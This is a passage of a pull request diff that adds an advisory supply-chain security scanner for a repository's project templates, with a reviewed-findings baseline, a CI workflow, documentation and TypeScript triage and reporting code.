### PR TITLE
feat: add template contribution security harness

### DIFF
--- a/.github/template-security-baseline.json
+++ b/.github/template-security-baseline.json
@@ -1,0 +1,250 @@
+{
+  "schemaVersion": 1,
+  "acknowledgements": [
+    {
+      "fingerprint": "4c82d437e22cd73376ff1e32fd159bf2dab749169d945d3af003a134e69e3dfe",
+      "ruleId": "manifest-lifecycle-script",
+      "subject": "x402-solana-rust",
+      "location": "community/x402-solana-rust/package.json",
+      "rationale": "Reviewed bundled interactive scaffolder: it exits in CI and pnpm source installs, copies local template files, and runs npm install only for the generated frontend."
+    },
+    {
+      "fingerprint": "e9b432d6d23af90c1365faaa4b590dd43d5e4815c0788793ab4b7b419ca22763",
+      "ruleId": "source-child-process",
+      "subject": "community/merkle-airdrop",
+      "location": "community/merkle-airdrop/anchor/codama.config.ts:31",
+      "rationale": "Reviewed Codama configuration: it invokes fixed local solana-keygen and anchor build commands for program generation without executing downloaded code."
+    },
+    {
+      "fingerprint": "f41efa0b200586832959e3c5759175948b65b221e2808400077e9850529e21fa",
+      "ruleId": "source-child-process",
+      "subject": "community/merkle-airdrop",
+      "location": "community/merkle-airdrop/anchor/codama.config.ts:34",
+      "rationale": "Reviewed Codama configuration: it invokes fixed local solana-keygen and anchor build commands for program generation without executing downloaded code."
+    },
+    {
+      "fingerprint": "8b0ff454723c924b156c9cbc77beac5e996da7d4797cc80dce4c1a2a501dffd8",
+      "ruleId": "source-child-process",
+      "subject": "community/merkle-airdrop",
+      "location": "community/merkle-airdrop/anchor/codama.config.ts:7",
+      "rationale": "Reviewed Codama configuration: it invokes fixed local solana-keygen and anchor build commands for program generation without executing downloaded code."
+    },
+    {
+      "fingerprint": "83472135f87e566efde9aa684de29eb8059b44c88144c6eaa95066733f91f5bc",
+      "ruleId": "source-child-process",
+      "subject": "community/merkle-airdrop",
+      "location": "community/merkle-airdrop/anchor/codama.config.ts:90",
+      "rationale": "Reviewed Codama configuration: it invokes fixed local solana-keygen and anchor build commands for program generation without executing downloaded code."
+    },
+    {
+      "fingerprint": "9ce6cdbb4e35b0c32258666bb50b0c6e5da87105129a84c04e4f25a66881e368",
+      "ruleId": "source-child-process",
+      "subject": "community/x402-solana-rust",
+      "location": "community/x402-solana-rust/create.js:10",
+      "rationale": "Reviewed bundled interactive scaffolder: it exits in CI and pnpm source installs, copies local template files, and runs npm install only for the generated frontend."
+    },
+    {
+      "fingerprint": "8e12a5c04021bf1ced0e04be31a3c62da336f31ee59967987d8f50079207b346",
+      "ruleId": "source-child-process",
+      "subject": "community/x402-solana-rust",
+      "location": "community/x402-solana-rust/create.js:185",
+      "rationale": "Reviewed bundled interactive scaffolder: it exits in CI and pnpm source installs, copies local template files, and runs npm install only for the generated frontend."
+    },
+    {
+      "fingerprint": "0894c55d77237f22460dc3fac890f60e315aea1c9bd6b9ce9c1ee349394370a0",
+      "ruleId": "dependency-build-script-allowed",
+      "subject": "@parcel/watcher@2.5.1",
+      "location": "node_modules/.pnpm/@parcel+watcher@2.5.1/node_modules/@parcel/watcher/package.json",
+      "rationale": "Exact install script reviewed and package is explicitly permitted by pnpm onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "4ead4b21db857a94ac8b1756b71fccb37c71a1dca49b929a320fbe8ae7671634",
+      "ruleId": "dependency-build-script-allowed",
+      "subject": "bigint-buffer@1.1.5",
+      "location": "node_modules/.pnpm/bigint-buffer@1.1.5/node_modules/bigint-buffer/package.json",
+      "rationale": "Exact install script reviewed and package is explicitly permitted by pnpm onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "371cc2d82abe56ed5b5f59ffa3cf75e8fcef898368ffc7c0dfd1a8d4ce1fe8af",
+      "ruleId": "dependency-build-script-allowed",
+      "subject": "bufferutil@4.0.9",
+      "location": "node_modules/.pnpm/bufferutil@4.0.9/node_modules/bufferutil/package.json",
+      "rationale": "Exact install script reviewed and package is explicitly permitted by pnpm onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "84cc75b7baf1df99121ebdb26843efad730a7b772b7691bbb801ccd768a40c95",
+      "ruleId": "dependency-build-script-allowed",
+      "subject": "esbuild@0.21.5",
+      "location": "node_modules/.pnpm/esbuild@0.21.5/node_modules/esbuild/package.json",
+      "rationale": "Exact install script reviewed and package is explicitly permitted by pnpm onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "dc393b022f5515ba50251cefed55a39fc749ba4e91a889e137fe40f50c6617fd",
+      "ruleId": "dependency-build-script-allowed",
+      "subject": "esbuild@0.25.10",
+      "location": "node_modules/.pnpm/esbuild@0.25.10/node_modules/esbuild/package.json",
+      "rationale": "Exact install script reviewed and package is explicitly permitted by pnpm onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "43708cc19c2d5c997815da0149e6ecb566678db8aac05e359b7a00d8dd5a3bcb",
+      "ruleId": "dependency-build-script-allowed",
+      "subject": "sharp@0.33.5",
+      "location": "node_modules/.pnpm/sharp@0.33.5/node_modules/sharp/package.json",
+      "rationale": "Exact install script reviewed and package is explicitly permitted by pnpm onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "ba985a2812bd093a35c563fd5bb42956a38492f0a0eb1db98a82f715a1b462dd",
+      "ruleId": "dependency-build-script-allowed",
+      "subject": "sharp@0.34.5",
+      "location": "node_modules/.pnpm/sharp@0.34.5/node_modules/sharp/package.json",
+      "rationale": "Exact install script reviewed and package is explicitly permitted by pnpm onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "4a1b15f49b43ddfd2e4a436c765d3bb942efbf7f89b3768667f67643befb33bb",
+      "ruleId": "dependency-build-script-allowed",
+      "subject": "unrs-resolver@1.11.1",
+      "location": "node_modules/.pnpm/unrs-resolver@1.11.1/node_modules/unrs-resolver/package.json",
+      "rationale": "Exact install script reviewed and package is explicitly permitted by pnpm onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "37688d9b3ce6f5a949bed0b06dd307e5f0d504f37524eb44fd1d3b9bef8ebf6f",
+      "ruleId": "dependency-build-script-allowed",
+      "subject": "utf-8-validate@5.0.10",
+      "location": "node_modules/.pnpm/utf-8-validate@5.0.10/node_modules/utf-8-validate/package.json",
+      "rationale": "Exact install script reviewed and package is explicitly permitted by pnpm onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "fc14b60fc8c912eccb8eb51d43d6635282efe8f66a5f61d59f365271ef79d02a",
+      "ruleId": "source-network-access",
+      "subject": "community/kit-node-solanax402",
+      "location": "community/kit-node-solanax402/src/server/index.ts:214",
+      "rationale": "Reviewed expected runtime or test request to the configured x402 server or facilitator; responses are parsed as data and are not executed."
+    },
+    {
+      "fingerprint": "64be8cfde4169ddbb4c9b5097c881eb4e00736c7a0d576a829006054b155dcaf",
+      "ruleId": "source-network-access",
+      "subject": "community/kit-node-solanax402",
+      "location": "community/kit-node-solanax402/test-402-response.mjs:28",
+      "rationale": "Reviewed expected runtime or test request to the configured x402 server or facilitator; responses are parsed as data and are not executed."
+    },
+    {
+      "fingerprint": "96c9b0517ca489a0f16d3c394bc3e0cb92f20c971660d57e65a473f5b6904b30",
+      "ruleId": "source-network-access",
+      "subject": "community/kit-node-solanax402",
+      "location": "community/kit-node-solanax402/test-replay-attack.mjs:140",
+      "rationale": "Reviewed expected runtime or test request to the configured x402 server or facilitator; responses are parsed as data and are not executed."
+    },
+    {
+      "fingerprint": "01de860767f4a89c9844ad0c8c792562158a06d5dba2f1f4a49ebb9f2e23aefd",
+      "ruleId": "source-network-access",
+      "subject": "community/kit-node-solanax402",
+      "location": "community/kit-node-solanax402/test-true-x402.mjs:184",
+      "rationale": "Reviewed expected runtime or test request to the configured x402 server or facilitator; responses are parsed as data and are not executed."
+    },
+    {
+      "fingerprint": "025968caa42330873a711ee46560143252ece6b0c9ae752f1fcb78d77d5d0a7f",
+      "ruleId": "template-lockfile-coverage-missing",
+      "subject": "kit-expo-minimal",
+      "location": "mobile/kit-expo-minimal/package.json",
+      "rationale": "Known repository coverage gap: mobile templates are catalogued outside the root pnpm workspace and remain visible here until separately locked or scanned."
+    },
+    {
+      "fingerprint": "77cd9705bc3ef295f5e582c51708dc7ea36f1239de1a5986a8c28f02be2e506d",
+      "ruleId": "template-lockfile-coverage-missing",
+      "subject": "kit-expo-privy",
+      "location": "mobile/kit-expo-privy/package.json",
+      "rationale": "Known repository coverage gap: mobile templates are catalogued outside the root pnpm workspace and remain visible here until separately locked or scanned."
+    },
+    {
+      "fingerprint": "6d09028221143b7bc000bc788b3d7ae5af99a0fa2ed2d73f16d3dcf5326baa3c",
+      "ruleId": "template-lockfile-coverage-missing",
+      "subject": "kit-expo-uniwind",
+      "location": "mobile/kit-expo-uniwind/package.json",
+      "rationale": "Known repository coverage gap: mobile templates are catalogued outside the root pnpm workspace and remain visible here until separately locked or scanned."
+    },
+    {
+      "fingerprint": "46832f497bb61eeb488fc75518a52adc9ae2da6a73b0c49687cdb37b5b82c5b6",
+      "ruleId": "template-lockfile-coverage-missing",
+      "subject": "web3js-expo-minimal",
+      "location": "mobile/web3js-expo-minimal/package.json",
+      "rationale": "Known repository coverage gap: mobile templates are catalogued outside the root pnpm workspace and remain visible here until separately locked or scanned."
+    },
+    {
+      "fingerprint": "43a0e24a268ecb2cde5e41e39912fdf356c8197f1ef3117fbafca1da20a04f22",
+      "ruleId": "template-lockfile-coverage-missing",
+      "subject": "web3js-expo-paper",
+      "location": "mobile/web3js-expo-paper/package.json",
+      "rationale": "Known repository coverage gap: mobile templates are catalogued outside the root pnpm workspace and remain visible here until separately locked or scanned."
+    },
+    {
+      "fingerprint": "e7d30f6da52e074d435aeb1f4bb4684437ed04ae1ed26279948066d473858573",
+      "ruleId": "template-lockfile-coverage-missing",
+      "subject": "web3js-expo",
+      "location": "mobile/web3js-expo/package.json",
+      "rationale": "Known repository coverage gap: mobile templates are catalogued outside the root pnpm workspace and remain visible here until separately locked or scanned."
+    },
+    {
+      "fingerprint": "1ff10eddce13b9d300976ac8440f2a639ed34a2d2b55fc6c372991734702382a",
+      "ruleId": "dependency-build-script-blocked",
+      "subject": "@stellar/stellar-sdk@14.2.0",
+      "location": "node_modules/.pnpm/@stellar+stellar-sdk@14.2.0/node_modules/@stellar/stellar-sdk/package.json",
+      "rationale": "Exact install script is blocked by pnpm because the package is absent from onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "8153da1fdb6381008d84e5e141eaad9db3093f371dbb1227ebaee356dc466b77",
+      "ruleId": "dependency-build-script-blocked",
+      "subject": "blake-hash@2.0.0",
+      "location": "node_modules/.pnpm/blake-hash@2.0.0/node_modules/blake-hash/package.json",
+      "rationale": "Exact install script is blocked by pnpm because the package is absent from onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "ba763a8b0434bddd37333eb0f7e0a4cdde0407fbbec161c7a111f95dfd705115",
+      "ruleId": "dependency-build-script-blocked",
+      "subject": "keccak@3.0.4",
+      "location": "node_modules/.pnpm/keccak@3.0.4/node_modules/keccak/package.json",
+      "rationale": "Exact install script is blocked by pnpm because the package is absent from onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "d77477c51cf2835a71423ac11b903cad30a8692fce6d1f94871c7df7eb4d42db",
+      "ruleId": "dependency-build-script-blocked",
+      "subject": "protobufjs@7.4.0",
+      "location": "node_modules/.pnpm/protobufjs@7.4.0/node_modules/protobufjs/package.json",
+      "rationale": "Exact install script is blocked by pnpm because the package is absent from onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "a0bce6aab381c1c9ecae4ad5cd99f51166c1f71fc5f2296526d8a962e06dbb85",
+      "ruleId": "dependency-build-script-blocked",
+      "subject": "protobufjs@7.5.4",
+      "location": "node_modules/.pnpm/protobufjs@7.5.4/node_modules/protobufjs/package.json",
+      "rationale": "Exact install script is blocked by pnpm because the package is absent from onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "7cddab9195c7e97c99bbf2ed42772d67e19118bcbf36ab1163962364901e0de7",
+      "ruleId": "dependency-build-script-blocked",
+      "subject": "puppeteer@23.11.1",
+      "location": "node_modules/.pnpm/puppeteer@23.11.1_bufferutil@4.0.9_typescript@5.9.3_utf-8-validate@5.0.10/node_modules/puppeteer/package.json",
+      "rationale": "Exact install script is blocked by pnpm because the package is absent from onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "f886636f016573ea6f589ad487fa9b4247ff34d62db5ef228c7dcd17664e6268",
+      "ruleId": "dependency-build-script-blocked",
+      "subject": "sqlite3@5.1.7",
+      "location": "node_modules/.pnpm/sqlite3@5.1.7/node_modules/sqlite3/package.json",
+      "rationale": "Exact install script is blocked by pnpm because the package is absent from onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "c79bcfd76edd83e10c6df548d3ca3e0ca3f19eb7632890a80321d762ef73c172",
+      "ruleId": "dependency-build-script-blocked",
+      "subject": "tiny-secp256k1@1.1.7",
+      "location": "node_modules/.pnpm/tiny-secp256k1@1.1.7/node_modules/tiny-secp256k1/package.json",
+      "rationale": "Exact install script is blocked by pnpm because the package is absent from onlyBuiltDependencies; script changes produce a new fingerprint."
+    },
+    {
+      "fingerprint": "0b7a06ea8ca3c58cbc12c9ddb4bad9250e4d60ac31073890a083bb4320cda37d",
+      "ruleId": "dependency-build-script-blocked",
+      "subject": "usb@2.17.0",
+      "location": "node_modules/.pnpm/usb@2.17.0/node_modules/usb/package.json",
+      "rationale": "Exact install script is blocked by pnpm because the package is absent from onlyBuiltDependencies; script changes produce a new fingerprint."
+    }
+  ]
+}

--- a/.github/workflows/template-security.yml
+++ b/.github/workflows/template-security.yml
@@ -17,7 +17,7 @@ jobs:
     name: Advisory scan
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262 # v4
       - name: Select security baseline
         env:
           BASE_SHA: ${{ github.event.pull_request.base.sha }}
@@ -34,10 +34,10 @@ jobs:
             printf '%s\n' '{"schemaVersion":1,"acknowledgements":[]}' > "$baseline_path"
           fi
           echo "SECURITY_BASELINE_PATH=$baseline_path" >> "$GITHUB_ENV"
-      - uses: pnpm/action-setup@v4
+      - uses: pnpm/action-setup@b906affcce14559ad1aafd4ab0e942779e9f58b1 # v4
         with:
           version: 10.5.2
-      - uses: actions/setup-node@v4
+      - uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
         with:
           node-version: 24
           cache: pnpm
@@ -53,7 +53,7 @@ jobs:
         run: cat security-reports/report.md >> "$GITHUB_STEP_SUMMARY"
       - name: Upload security report
         if: always() && hashFiles('security-reports/report.json') != ''
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4
         with:
           name: template-security-report
           path: security-reports/

--- a/.github/workflows/template-security.yml
+++ b/.github/workflows/template-security.yml
@@ -1,0 +1,59 @@
+name: Template security review
+
+on:
+  pull_request:
+  push:
+    branches:
+      - main
+  schedule:
+    - cron: '17 9 * * 1'
+  workflow_dispatch:
+
+permissions:
+  contents: read
+
+jobs:
+  review:
+    name: Advisory scan
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: Select security baseline
+        env:
+          BASE_SHA: ${{ github.event.pull_request.base.sha }}
+        run: |
+          baseline_path="$RUNNER_TEMP/template-security-baseline.json"
+          if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then
+            git fetch --no-tags --depth=1 origin "$BASE_SHA"
+            if ! git show "$BASE_SHA:.github/template-security-baseline.json" > "$baseline_path" 2>/dev/null; then
+              printf '%s\n' '{"schemaVersion":1,"acknowledgements":[]}' > "$baseline_path"
+            fi
+          elif [[ -f .github/template-security-baseline.json ]]; then
+            cp .github/template-security-baseline.json "$baseline_path"
+          else
+            printf '%s\n' '{"schemaVersion":1,"acknowledgements":[]}' > "$baseline_path"
+          fi
+          echo "SECURITY_BASELINE_PATH=$baseline_path" >> "$GITHUB_ENV"
+      - uses: pnpm/action-setup@v4
+        with:
+          version: 10.5.2
+      - uses: actions/setup-node@v4
+        with:
+          node-version: 24
+          cache: pnpm
+      - name: Install dependencies without executing lifecycle scripts
+        run: pnpm install --frozen-lockfile --ignore-pnpmfile --ignore-scripts
+      - name: Test security harness
+        run: pnpm security:test
+      - name: Scan templates
+        if: always()
+        run: pnpm security:check -- --baseline "$SECURITY_BASELINE_PATH" --output-dir security-reports
+      - name: Add report to job summary
+        if: always() && hashFiles('security-reports/report.md') != ''
+        run: cat security-reports/report.md >> "$GITHUB_STEP_SUMMARY"
+      - name: Upload security report
+        if: always() && hashFiles('security-reports/report.json') != ''
+        uses: actions/upload-artifact@v4
+        with:
+          name: template-security-report
+          path: security-reports/

--- a/.gitignore
+++ b/.gitignore
@@ -93,3 +93,6 @@ web3js/**/tmp
 
 # AI
 **/.claude/
+
+# advisory template security reports
+security-reports/

--- a/docs/security-harness.md
+++ b/docs/security-harness.md
@@ -1,0 +1,52 @@
+# Template security harness
+
+The template security harness provides an advisory supply-chain review for every template contribution and a repeatable scan of the existing catalog.
+
+Run it from the repository root:
+
+```shell
+pnpm security:test
+pnpm security:check
+```
+
+The scan writes `security-reports/report.json` for automation and `security-reports/report.md` for reviewers. CI also adds the Markdown report to the job summary and uploads both files as an artifact.
+
+The checked-in `.github/template-security-baseline.json` records findings that have already received human review. The report separates new findings from acknowledged findings instead of repeating every known item as new on each pull request.
+
+## What it reviews
+
+- install and publish lifecycle scripts in template `package.json` files
+- direct dependencies sourced from Git, HTTP, local paths, or the workspace
+- unusually loose or mutable direct dependency versions
+- explicit shell, downloader, and inline-code commands in package scripts
+- dynamic evaluation, encoded payloads, child processes, and network calls in setup, config, and script files
+- install-time scripts shipped by installed dependencies, including whether pnpm allows them to run
+- templates missing from the workspace lockfile, where transitive dependency coverage is incomplete
+- the workspace pnpm build-script allowlist
+- pnpm's minimum package release-age policy
+
+## Triage model
+
+Findings are review prompts, not automatic vulnerabilities. The scanner exits successfully when it finds review items so legitimate packages such as native build tools do not block contributors. Reviewers should inspect new evidence and either remove the behavior, document why it is needed, or keep an intentionally reviewed dependency in `onlyBuiltDependencies`.
+
+Each baseline acknowledgement contains an exact fingerprint of the rule, severity, subject, location, category, and evidence that was reviewed, plus a rationale. Scanner message and recommendation wording are not part of the fingerprint. If the underlying command, dependency script, source pattern, severity, or location changes, the finding is reported as new and the previous acknowledgement becomes stale. This makes behavior changes visible without hiding the reviewed catalog state.
+
+Baseline changes require the same human review as source changes. Add an acknowledgement only after inspecting the referenced code or dependency script, and remove stale acknowledgements once the old behavior no longer exists. Acknowledged and stale items remain in both report formats for auditability.
+
+Pull request scans use the baseline from the exact target-branch commit, not the version proposed by the pull request. A contributor therefore cannot make new behavior appear previously acknowledged by adding its fingerprint in the same change. After an approved baseline update lands, push and scheduled scans use the updated baseline normally.
+
+When the target branch has no baseline yet, as during the initial rollout, the workflow uses an empty baseline and reports every discovered item as new for one-time review.
+
+The workflow intentionally runs on every pull request. Template roots are discovered from `repokit.groups`, so a static path filter could silently miss a root added after the workflow was written.
+
+To compare against a different baseline without editing the repository default:
+
+```shell
+pnpm security:check -- --baseline path/to/baseline.json
+```
+
+The workflow installs with `--ignore-scripts` and `--ignore-pnpmfile`, so dependency lifecycle code and repository-controlled pnpm hooks are not executed before inspection. An execution error, malformed configuration, or missing report is still a workflow failure because the repository was not actually scanned.
+
+## Deliberate limits
+
+The harness is deterministic and does not query package registries. It verifies that pnpm's existing minimum release-age policy remains enabled, but it does not score individual package publication dates or package-name similarity. Those checks can be added later as a separately cached advisory data source without making the required review path depend on mutable external data.

--- a/package.json
+++ b/package.json
@@ -9,6 +9,8 @@
     "generate": "tsx scripts/generate.ts && automd",
     "format": "prettier --write .",
     "lint": "tsx scripts/lint.ts && prettier --check .",
+    "security:check": "tsx scripts/security-check.ts",
+    "security:test": "tsx --test scripts/security/*.test.ts",
     "test": "echo \"Error: no test specified\" && exit 1",
     "update-deps": "pnpm -r update --latest",
     "validate": "tsx scripts/validate.ts"
@@ -23,7 +25,8 @@
     "prettier": "^3.6.2",
     "puppeteer": "^23.11.1",
     "sharp": "^0.33.5",
-    "tsx": "^4.19.2"
+    "tsx": "^4.19.2",
+    "yaml": "^2.8.1"
   },
   "repokit": {
     "groups": [

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -29,6 +29,9 @@ importers:
       tsx:
         specifier: ^4.19.2
         version: 4.20.6
+      yaml:
+        specifier: ^2.8.1
+        version: 2.8.4
 
   community/commerce-kit-store:
     dependencies:

--- a/scripts/security-check.ts
+++ b/scripts/security-check.ts
@@ -1,0 +1,45 @@
+import { mkdirSync, writeFileSync } from 'fs'
+import { resolve } from 'path'
+import { readSecurityBaseline } from './security/baseline.js'
+import { createSecurityReport, renderSecurityReport } from './security/report.js'
+import { scanRepository } from './security/scanner.js'
+
+const options = readOptions(process.argv.slice(2))
+const outputDir = resolve(options.outputDir)
+const baseline = readSecurityBaseline(resolve(options.baselinePath))
+const report = createSecurityReport(scanRepository(process.cwd()), baseline)
+const markdown = renderSecurityReport(report)
+
+mkdirSync(outputDir, { recursive: true })
+writeFileSync(resolve(outputDir, 'report.json'), `${JSON.stringify(report, null, 2)}\n`)
+writeFileSync(resolve(outputDir, 'report.md'), markdown)
+
+console.log(markdown)
+console.log(`Reports written to ${outputDir}`)
+
+type CliOptions = { readonly baselinePath: string; readonly outputDir: string }
+
+function readOptions(args: readonly string[]): CliOptions {
+  let baselinePath = '.github/template-security-baseline.json'
+  let outputDir = 'security-reports'
+
+  for (let index = 0; index < args.length; index += 1) {
+    const argument = args[index]
+    if (argument === '--') continue
+    if (argument === '--help') {
+      console.log('Usage: pnpm security:check -- [--baseline <file>] [--output-dir <directory>]')
+      process.exit(0)
+    }
+    if (argument === '--baseline' || argument === '--output-dir') {
+      const value = args[index + 1]
+      if (!value || value.startsWith('--')) throw new Error(`${argument} requires a value`)
+      if (argument === '--baseline') baselinePath = value
+      else outputDir = value
+      index += 1
+      continue
+    }
+    throw new Error(`Unknown argument: ${argument}`)
+  }
+
+  return { baselinePath, outputDir }
+}

--- a/scripts/security/baseline.ts
+++ b/scripts/security/baseline.ts
@@ -1,0 +1,115 @@
+import { existsSync, readFileSync } from 'fs'
+import { createHash } from 'node:crypto'
+import type {
+  BaselineAcknowledgement,
+  SecurityBaseline,
+  SecurityFinding,
+  TriageResult,
+  TriagedFinding,
+} from './types.js'
+
+export const EMPTY_SECURITY_BASELINE: SecurityBaseline = { acknowledgements: [], schemaVersion: 1 }
+
+export function readSecurityBaseline(path: string): SecurityBaseline {
+  if (!existsSync(path)) return EMPTY_SECURITY_BASELINE
+  return parseSecurityBaseline(JSON.parse(readFileSync(path, 'utf8')) as unknown)
+}
+
+export function parseSecurityBaseline(value: unknown): SecurityBaseline {
+  if (!isRecord(value) || value.schemaVersion !== 1 || !Array.isArray(value.acknowledgements)) {
+    throw new Error('Security baseline must have schemaVersion 1 and an acknowledgements array')
+  }
+
+  const acknowledgements = value.acknowledgements.map(parseAcknowledgement)
+  const identities = new Set<string>()
+  for (const acknowledgement of acknowledgements) {
+    if (identities.has(acknowledgement.fingerprint)) {
+      throw new Error(`Security baseline contains a duplicate acknowledgement for ${acknowledgement.location}`)
+    }
+    identities.add(acknowledgement.fingerprint)
+  }
+
+  return { acknowledgements, schemaVersion: 1 }
+}
+
+export function triageFindings(findings: readonly SecurityFinding[], baseline: SecurityBaseline): TriageResult {
+  const acknowledgements = new Map(
+    baseline.acknowledgements.map((acknowledgement) => [acknowledgement.fingerprint, acknowledgement]),
+  )
+  const findingIdentities = new Set<string>()
+  const triagedFindings: TriagedFinding[] = []
+
+  for (const finding of findings) {
+    const identity = findingFingerprint(finding)
+    if (findingIdentities.has(identity)) {
+      throw new Error(`Scanner produced a duplicate finding for ${finding.location}`)
+    }
+    findingIdentities.add(identity)
+    const acknowledgement = acknowledgements.get(identity)
+    if (acknowledgement && !acknowledgementMatchesFinding(acknowledgement, finding)) {
+      throw new Error(`Security baseline metadata does not match the finding for ${finding.location}`)
+    }
+    const { fingerprintEvidence: _fingerprintEvidence, ...reportFinding } = finding
+    triagedFindings.push(
+      acknowledgement
+        ? { ...reportFinding, disposition: 'acknowledged', rationale: acknowledgement.rationale }
+        : { ...reportFinding, disposition: 'new' },
+    )
+  }
+
+  return {
+    findings: triagedFindings,
+    staleAcknowledgements: baseline.acknowledgements.filter(
+      (acknowledgement) => !findingIdentities.has(acknowledgement.fingerprint),
+    ),
+  }
+}
+
+function acknowledgementMatchesFinding(acknowledgement: BaselineAcknowledgement, finding: SecurityFinding): boolean {
+  return (
+    acknowledgement.location === finding.location &&
+    acknowledgement.ruleId === finding.ruleId &&
+    acknowledgement.subject === finding.subject
+  )
+}
+
+function parseAcknowledgement(value: unknown, index: number): BaselineAcknowledgement {
+  if (!isRecord(value)) throw new Error(`Security baseline acknowledgement ${index + 1} must be an object`)
+
+  const fingerprint = readString(value, 'fingerprint', index)
+  if (!/^[a-f0-9]{64}$/.test(fingerprint)) {
+    throw new Error(`Security baseline acknowledgement ${index + 1} has an invalid fingerprint`)
+  }
+
+  return {
+    fingerprint,
+    location: readString(value, 'location', index),
+    rationale: readString(value, 'rationale', index),
+    ruleId: readString(value, 'ruleId', index),
+    subject: readString(value, 'subject', index),
+  }
+}
+
+function readString(value: Record<string, unknown>, key: string, index: number): string {
+  const field = value[key]
+  if (typeof field !== 'string' || field.trim() === '') {
+    throw new Error(`Security baseline acknowledgement ${index + 1} requires a non-empty ${key}`)
+  }
+  return field
+}
+
+export function findingFingerprint(finding: SecurityFinding): string {
+  const identity = JSON.stringify([
+    finding.category,
+    finding.fingerprintEvidence ?? finding.evidence,
+    finding.location,
+    finding.ruleId,
+    finding.severity,
+    finding.subject,
+  ])
+  return createHash('sha256').update(identity).digest('hex')
+}
+
+function isRecord(value: unknown): value is Record<string, unknown> {
+  return typeof value === 'object' && value !== null && !Array.isArray(value)
+}

--- a/scripts/security/report.ts
+++ b/scripts/security/report.ts
@@ -1,0 +1,126 @@
+import { triageFindings } from './baseline.js'
+import type {
+  BaselineAcknowledgement,
+  FindingSeverity,
+  ScanResult,
+  SecurityBaseline,
+  SecurityReport,
+  SecuritySummary,
+  TriagedFinding,
+} from './types.js'
+
+export function createSecurityReport(
+  scan: ScanResult,
+  baseline: SecurityBaseline,
+  generatedAt = new Date().toISOString(),
+): SecurityReport {
+  const triage = triageFindings(scan.findings, baseline)
+  return {
+    findings: triage.findings,
+    generatedAt,
+    scannedDependencyPackages: scan.scannedDependencyPackages,
+    scannedTemplates: scan.scannedTemplates,
+    schemaVersion: 1,
+    staleAcknowledgements: triage.staleAcknowledgements,
+    summary: summarizeFindings(triage.findings, triage.staleAcknowledgements),
+  }
+}
+
+export function renderSecurityReport(report: SecurityReport): string {
+  const lines = [
+    '# Template security review',
+    '',
+    '> Advisory only: findings require human review and do not fail the workflow.',
+    '',
+    `Generated: ${report.generatedAt}`,
+    '',
+    `Scanned ${report.scannedTemplates} templates and ${report.scannedDependencyPackages} installed dependency packages.`,
+    '',
+    `Findings: ${report.summary.new} new, ${report.summary.acknowledged} acknowledged, and ${report.summary.staleAcknowledgements} stale acknowledgements.`,
+    '',
+    `Severity totals: ${report.summary.high} high, ${report.summary.medium} medium, ${report.summary.low} low.`,
+    '',
+  ]
+
+  const newFindings = report.findings.filter((finding) => finding.disposition === 'new')
+  const acknowledgedFindings = report.findings.filter((finding) => finding.disposition === 'acknowledged')
+
+  lines.push('## New findings', '')
+  if (newFindings.length === 0) lines.push('No new findings.', '')
+  else renderFindingTable(lines, newFindings)
+
+  if (newFindings.length > 0) lines.push('## Review guidance', '')
+  for (const finding of newFindings) {
+    lines.push(
+      `### ${finding.severity.toUpperCase()}: ${finding.ruleId}`,
+      '',
+      `- Subject: ${sanitizeDisplayText(finding.subject)}`,
+      `- Location: ${sanitizeDisplayText(finding.location)}`,
+      `- Why it was flagged: ${finding.message}`,
+      `- Recommendation: ${finding.recommendation}`,
+      '',
+    )
+  }
+
+  lines.push('## Acknowledged findings', '')
+  if (acknowledgedFindings.length === 0) lines.push('No acknowledged findings.', '')
+  else {
+    lines.push('| Severity | Rule | Subject | Location | Rationale |', '| --- | --- | --- | --- | --- |')
+    for (const finding of acknowledgedFindings) {
+      lines.push(
+        `| ${finding.severity.toUpperCase()} | ${escapeTableCell(finding.ruleId)} | ${escapeTableCell(finding.subject)} | ${escapeTableCell(finding.location)} | ${escapeTableCell(finding.rationale ?? '')} |`,
+      )
+    }
+    lines.push('')
+  }
+
+  lines.push('## Stale acknowledgements', '')
+  if (report.staleAcknowledgements.length === 0) lines.push('No stale acknowledgements.', '')
+  else {
+    lines.push('| Rule | Subject | Location | Previous rationale |', '| --- | --- | --- | --- |')
+    for (const acknowledgement of report.staleAcknowledgements) {
+      lines.push(
+        `| ${escapeTableCell(acknowledgement.ruleId)} | ${escapeTableCell(acknowledgement.subject)} | ${escapeTableCell(acknowledgement.location)} | ${escapeTableCell(acknowledgement.rationale)} |`,
+      )
+    }
+    lines.push('')
+  }
+
+  return lines.join('\n')
+}
+
+function renderFindingTable(lines: string[], findings: readonly TriagedFinding[]): void {
+  lines.push('| Severity | Rule | Subject | Location | Evidence |', '| --- | --- | --- | --- | --- |')
+  for (const finding of findings) {
+    lines.push(
